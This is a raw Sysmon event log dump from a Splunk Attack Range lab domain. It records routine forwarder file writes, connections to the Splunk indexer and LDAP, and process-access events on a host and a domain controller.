Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=723F1453F398B2CC3E575AE1FEA32C99,SHA256=9DF4272E14B2EC9C33B24EF1B4B3031EF55C9AA7FA320D7C8217EF6C5B8504A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806234Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:13.159{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A969951358CDF7A8AF3488BDC72BBBCE,SHA256=B339CDB010EBA11F92D8F2C13A87B0B36E21645C89E08978222669AEF51B1F7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046400Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:14.400{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=131B9421C53EBE064ABB261007FB2935,SHA256=CD3B76D75CBE8C8767896B0860CF1519F88A57D68C16557326BDBF922C991473,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806236Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:12.308{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57168-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806235Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:14.172{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B2F140DB0B6D9548A471A44D52F33F0,SHA256=23FB5AD4DAE2B7FB73A055DFAB056114562A78F1791A67552D1B5E94515BAEE0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046405Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:07.887{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local50923-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001046404Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:07.887{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local50923-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x80000000000000001046403Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:15.415{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB59CB561D812F324543AA37D7AE18F2,SHA256=7A8F97C3D4F5B2E09080F3FD9D890F07A5E761990E350B1A550C17941AF24F16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806237Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:15.172{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15816816388C2A9238773041885BC7DB,SHA256=F9306988C5849C831E61579EDEA681A4FCB5DF9BDA4D1C7955D823CFD50FBDCB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046402Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:15.351{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3D162B1B36F3E948E03DAC4626BB667C,SHA256=60404DCCE3D6AF264081902350106F86CCD4830CE6DBAA923B2B86BFE6A54A11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046401Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:15.350{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=67C81478DF0D8F416C51AE3ED34C2D1A,SHA256=421832B6BD625ACE8673263D4FC1AA1D22A8E7FD2EE1EE9D7EC0534D47C939F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046406Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:16.429{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED5C0ADDF6C986333624A23623281F2E,SHA256=CA9B833F600C480CB243C738C323C96831A12CD9CC9C4F769BBF68A06CFB5989,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806238Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:16.172{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4CFBD925751B43C6CD37985BC2A4B18,SHA256=4B4764F7C8DA6CC49628B9A213B563FA4D6394A0D20BF8EB1D7DD3E775069DCD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046407Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:17.466{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BE571EF201FC5EC2DE936A02CFAA0DA,SHA256=F736D3146A4CAA129D751260ED0C6EB60806F180EB813B248AF3212CFB6D8048,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806239Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:17.188{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F64BE4EB9F3C3E83200B8C68CDA20CBB,SHA256=54EF00A8E3A1D45FC90789CF0C4F6CCC2E976C3AB7277447DB4C0691BAFA0B70,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046417Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:10.783{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50924-false10.0.1.12-8000- 10341000x80000000000000001046416Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:18.727{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046415Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:18.727{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046414Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:18.727{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046413Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:18.727{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046412Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:18.727{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046411Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:18.727{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046410Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:18.727{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001046409Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:18.481{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07842C865AE455439593DFC88E82FC0A,SHA256=01C23E0F290EE3C729910EB3617056B22DCFD3FEA8CC77AF0B5E302F8F14CA5D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806241Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:17.352{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57169-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806240Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:18.250{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE85434C526364DAF8EF89ACE9E19ED0,SHA256=BE8A1B20CFAD0EAA3C6E0C72EDE1341856322558614F22379E6D3BCBAC9CFEBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046408Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:18.165{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046418Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:19.496{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29D60DF9D71D6CD49730C72EFF73952A,SHA256=2CFFFE6E446DB2E5EF49EBE92772D4004B1B1D5A259B38469D20AA96A0549928,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806242Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:19.266{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAFB1C7DDB6DAF4D42C3E63670F5EFC7,SHA256=58C678E8507785DB1F6A0FC871CE7A91AF6479424BF1893D061A86D65AE0DAC1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046419Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:20.511{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2852E47CF15CA79437DE9EC883312403,SHA256=D6AE6FB3F997E57B735D207EEDFA9C9C89BB9370696630141E48B1F3765A023C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806244Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:20.344{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806243Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:20.266{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F0A405F8AEF00841DD79613E78811D6,SHA256=E084B227EF9EFA159515EA31488D66FD033AE7617B7287E8CD4FAE11487D230C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046420Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:21.525{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8589A24C57EE2710C274DA9B7F499228,SHA256=A2A339A528D2787835742CE87A4F8A43F73E706A89B0766EFCEC33818E215E93,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806245Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:21.297{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB417631B2095ADFB0485FAE5C85CFDB,SHA256=BC9F0410D3FDACE6AB0D397A0F98DEB876A45D8A18E7B323762AAF071518C28A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046421Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:22.561{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF809805748DC87909E3C1B2CE65A72C,SHA256=16333A0030876BEC3C0B8A66F6F6389EEC7659F9C17FE220BF16DC49AFB3432C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806247Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:22.328{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C19F45DACBF12B45AFEF6783DE67656,SHA256=95C933F2ABE7445B38DE7B87A28727C8696A6246EA1CD4EDB063C62E88B661F9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806246Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:20.477{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57170-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x80000000000000001046422Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:23.591{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=985ADFB7EAC16280E3E9B43532EA8149,SHA256=499EA559E3FA6BFE8378FFAA3A2F41AB0906C1EDB3506896853EF2DE79686954,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806248Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:23.375{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC2C9B0BC2A96B0B6EB078BC2D972DAB,SHA256=55B4A5FF4CC4EF433F6BE013AF61B0F39B4716C25CF12E299B3DBE6208305168,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046424Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:16.715{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50925-false10.0.1.12-8000- 23542300x80000000000000001046423Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:24.606{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC6D2F23F5A431663A72DC582B2B83D5,SHA256=39871D7BB21C7780DFBC555443F8292AAA05FCCD4399D5BBDEDA093DABE2E868,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806275Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:24.781{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F314-60EB-4379-00000000D001}2312C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806274Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:24.781{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806273Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:24.781{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806272Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:24.781{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806271Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 